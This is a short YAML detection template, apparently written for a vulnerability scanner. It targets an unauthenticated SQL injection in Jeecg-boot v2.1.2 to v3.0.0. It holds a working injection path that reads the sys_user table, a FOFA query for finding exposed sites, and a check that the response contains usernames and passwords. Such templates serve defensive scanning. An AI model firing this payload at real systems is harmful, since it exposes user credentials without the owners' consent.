id: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞
info:
name: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞
author: free2e
severity: high
verified: true
description: |-
Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞存在未授权注入漏洞,可以未授权构造sql语句,获取信息。
fofa-query: title=="JeecgBoot 企业级低代码平台"
affected: Jeecg-boot v2.1.2-v3.0.0
solutions: https://github.com/jeecgboot/jeecg-boot/commit/
reference:
- https://xz.aliyun.com/t/13186?time__1311=mqmxnDBDcD2A0%3DGODlxGORzQb%3Dqj2YS20iD&alichlgref=https%3A%2F%2Fwww.google.com.hk%2F
tags: Jeecg-boot,sqli,unauthorized,unauth
created: 2024/04/02
rules:
r0:
request:
method: GET
path: /jeecg-boot//sys/ng-alain/getDictItemsByTable/' from sys_user/*, '/x.js
expression: |
response.status == 200 &&
response.body.bcontains(b'"username":') &&
response.body.bcontains(b'"password":') &&
response.body.bcontains(b'"create_time":')
expression: r0()